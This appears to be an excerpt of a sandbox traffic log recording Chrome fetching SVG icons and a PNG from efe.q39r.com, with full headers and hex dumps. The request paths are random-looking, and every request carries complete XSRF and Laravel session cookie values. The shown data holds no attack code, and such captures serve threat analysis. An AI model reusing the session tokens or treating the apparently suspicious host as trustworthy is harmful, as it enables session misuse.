                                                                                  2024-04-25 16:23:35 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                                                  Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                                                  2024-04-25 16:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.2.1749764172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1480OUTGET /ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC660INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="ij50onkMRoXybYnI2RW73cdrhB5AKLQ1WQTq7e8mc2L3pvwh78164"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c7JsPlBPfvl287oiPSz7agqOct0rtl0DhEVlLbrrZIPmldUt799a94i3ftH8ID2jCjvOc%2BQ%2Bp1SVtm9ZTg%2FWdVeUGqcLpf6e9412jgNB6rM54H34Z2luqC%2Fk%2Fv58xg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadab3ae4ad86-ATL
                                                                                  2024-04-25 16:23:35 UTC709INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                                                  Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 39 37 36 32 20 30 5a 4d 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39
                                                                                  Data Ascii: 9762 0ZM12.2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32
                                                                                  Data Ascii: 33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 34 4c 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35
                                                                                  Data Ascii: 4L28.1744 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 37 34 30 38 20 34 31 2e 36 34 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31
                                                                                  Data Ascii: 7408 41.643 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.31
                                                                                  2024-04-25 16:23:35 UTC1213INData Raw: 34 38 2e 32 39 37 37 4c 31 37 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35
                                                                                  Data Ascii: 48.2977L17.489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15
                                                                                  2024-04-25 16:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.2.1749768172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1472OUTGET /wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                  Sec-Fetch-Site: same-origin
                                                                                  Sec-Fetch-Mode: no-cors
                                                                                  Sec-Fetch-Dest: image
                                                                                  Referer: https://efe.q39r.com/8571576472544462333778VmFvuqqgHOSOUIYLXDGJJKMTFCREDTXYXKXYYKGCLIZVNPFMHJGINBHVI?cbGXAgLMlUOzbXZpUQbIQpEphcjVBYMFBGIONZWCNGREHXQKOLNDMQG
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC648INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/svg+xml
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="wxasWsJm1F7lSOv2iLafEmnGnUVfWsJLmbqt2Gkyab175"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pYlbkHDVRRWvQaaKdrspLhU0Caj1JUNJAh%2FSuKsWQPSSc2pWSLYu%2F6KGRlY%2BuEWez6FzPfasJ9JXc8LYViX0qVWuLrhdeoCVCRwafH5CEeIC2qkI5KAwHDNedS48dw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadac4c0b136d-ATL
                                                                                  2024-04-25 16:23:35 UTC721INData Raw: 62 35 39 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 33 30 2e 34 32 32 2c 32 39 2e 30 39 32 61 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 32 36 31 2c 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2e 37 34 39 71 2e 33 36 36 2e 33 36 36 2e 38 32 37 2e 37 37 35 74 2e 39 34 39 2e 38 35
                                                                                  Data Ascii: b59<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.85
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 2e 36 39 2c 31 33 2e 34 38 35 2c 31 33 2e 34 38 35 2c 30 2c 30 2c 31 2c 36 2c 31 38 2e 38 36 36 2c 39 2e 34 35 33 2c 39 2e 34 35 33 2c 30 2c 30 2c 31 2c 36 2e 32 33 35 2c 31 36 2e 36 61 36 2e 32 2c 36 2e 32 2c 30 2c 30 2c 31 2c 2e 37 2d 31 2e 37 30 37 2c 38 2e 38 34 38 2c 38 2e 38 34 38 2c 30 2c 30 2c 31 2c 31 2e 31 34 31 2d 31 2e 34 38 39 71 2e 36 37 39 2d 2e 37 32 33 2c 31 2e 35 38 35 2d 31 2e 36 31 31 61 33 2e 33 38 31 2c 33 2e 33 38 31 2c 30 2c 30 2c 31 2c 31 2e 31 33 32 2d 2e 37 34 39 2c 33 2e 34 39 33 2c 33 2e 34 39 33 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2d 2e 32 36 31 2c 33 2e 33 2c 33 2e 33 2c 30 2c 30 2c 31 2c 31 2e 36 38 31 2e 34 37 2c 38 2e 36 34 38 2c 38 2e 36 34 38 2c 30 2c 30 2c 31 2c 31 2e 35 34 32 2c 31 2e 31 35 2c 31 37 2e 37 32 35 2c 31
                                                                                  Data Ascii: .69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,1
                                                                                  2024-04-25 16:23:35 UTC822INData Raw: 33 2e 35 32 2c 30 2c 30 2c 31 2d 2e 37 35 38 2d 31 2e 31 32 34 2c 33 2e 33 37 35 2c 33 2e 33 37 35 2c 30 2c 30 2c 31 2d 2e 32 37 2d 31 2e 33 33 33 2c 33 2e 30 36 32 2c 33 2e 30 36 32 2c 30 2c 30 2c 31 2c 2e 32 32 36 2d 31 2e 32 31 31 2c 34 2e 33 31 33 2c 34 2e 33 31 33 2c 30 2c 30 2c 31 2c 2e 35 36 36 2d 2e 39 36 37 2c 36 2e 33 36 34 2c 36 2e 33 36 34 2c 30 2c 30 2c 31 2c 2e 37 33 32 2d 2e 37 39 33 71 2e 33 39 32 2d 2e 33 35 37 2e 37 33 32 2d 2e 36 38 38 61 34 2e 36 37 38 2c 34 2e 36 37 38 2c 30 2c 30 2c 30 2c 2e 35 36 36 2d 2e 36 35 33 2c 31 2e 31 37 35 2c 31 2e 31 37 35 2c 30 2c 30 2c 30 2c 2e 32 32 36 2d 2e 36 38 38 2c 31 2e 33 33 39 2c 31 2e 33 33 39 2c 30 2c 30 2c 30 2d 2e 32 37 39 2d 2e 36 34 35 41 31 31 2e 32 39 33 2c 31 31 2e 32 39 33 2c 30 2c 30
                                                                                  Data Ascii: 3.52,0,0,1-.758-1.124,3.375,3.375,0,0,1-.27-1.333,3.062,3.062,0,0,1,.226-1.211,4.313,4.313,0,0,1,.566-.967,6.364,6.364,0,0,1,.732-.793q.392-.357.732-.688a4.678,4.678,0,0,0,.566-.653,1.175,1.175,0,0,0,.226-.688,1.339,1.339,0,0,0-.279-.645A11.293,11.293,0,0
                                                                                  2024-04-25 16:23:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.2.1749770172.67.218.124435448C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-04-25 16:23:34 UTC1176OUTGET /wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430 HTTP/1.1
                                                                                  Host: efe.q39r.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IkFFNjNBVFZGSjBsYUpNK1Fuc2dLTEE9PSIsInZhbHVlIjoiTDRZN1BPSVVBOGF6Zlp0NXU4d0xZUzUrQ1lPOHNyOWF5YUVFTk44Y3B2SnE3RVd3ODJ4OHU2eVhrNHVmV0QzMFhlSGtyWGRveTFvK0UxU2plWHJ1K1M2anhUZWR6bUo1b0NwUTcxVVJFeU9hZHpqL2ltUzZDcHdTOVFXWWRuYWIiLCJtYWMiOiJiYmRjNzhmYzNjY2RkODg5NzFlOTYyMjQzMmJiMjVlMjc4ZmMyZGQzY2NhNWY0MmU5YTYyZjk5MDFmNjAzN2I3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkNoTERwKy9CUFBtWFNIVERtZ2ZvNGc9PSIsInZhbHVlIjoiY2tMR0YwTU9xRFoybm9aWm9FN3g0TVpDOGJDZ0gxblJFT0pERFo2MUFiU1MrMlp1T21XRlNVUXNnYTlpdGNKUUF4bkc1d3BpRytGK0hBVGdwZ2Jmc0VsN0tHTW5pZFh5UjNuZ0JDaVFKQXVMcTB3SFNrNERqM1RsTjlGejg5TGsiLCJtYWMiOiIwZjdiNzBiMDVjNjg1YmRlYWY0NGUwMWVmNmI3YTY5ODBkMGYzYThkNTMzNzNiYmNmMGVkM2FkNDBmODUzMjZjIiwidGFnIjoiIn0%3D
                                                                                  2024-04-25 16:23:35 UTC706INHTTP/1.1 200 OK
                                                                                  Date: Thu, 25 Apr 2024 16:23:35 GMT
                                                                                  Content-Type: image/png
                                                                                  Content-Length: 259183
                                                                                  Connection: close
                                                                                  Content-Disposition: inline; filename="wxW67qXyrj6Vx0Tfu5cRa39uRp3UsvPq5ft22uk0KSw6D3TMfkrP5uXt2IKdP788HXJHkiwXCVeDyNaZS41ShN0mtBkm7fjNwOySWbWl1KwtDzywab430"
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cElecAHoH27ohVgQGEUnRuNqkJnoiQyJxfigJqceeiFyH5AmY3K0x2gS3XtWPv1qRuU5M6YYwsehRETJNybdSR5yAkw66fl7HjBNOVfVCHmU10dbLhzm01lnYmnyCA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 879fadacdce87bab-ATL
                                                                                  2024-04-25 16:23:35 UTC663INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 10 00 00 00 10 00 08 06 00 00 00 f2 a3 24 17 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ec dd 7b 8c 5d c7 5d 07 70 db cd 8b 52 11 1e 4d d2 78 77 66 6d 2b 02 d5 11 54 8a 49 a2 92 a0 aa 10 21 68 64 21 01 01 84 d4 a0 02 09 95 a0 04 51 a4 fc 41 d1 99 b9 4e 68 04 2a c5 50 28 ee 1f fc e1 56 50 59 14 81 82 40 22 52 4d a1 79 99 3b 73 ed e0 b4 22 29 69 08 7d 44 e4 d1 56 25 0d 71 6a 5f ce 5d 5b 55 9b c4 49 6c ef 7a ee e3 f3 91 be da f5 c6 de dd 7b ce 9c f3 1b e9 9b 3d bb 61 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii: PNGIHDR$pHYs IDATx{]]pRMxwfm+TI!hd!QANh*P(VPY@"RMy;s")i}DV%qj_][UIlz{=a
                                                                                  2024-04-25 16:23:35 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Data Ascii:
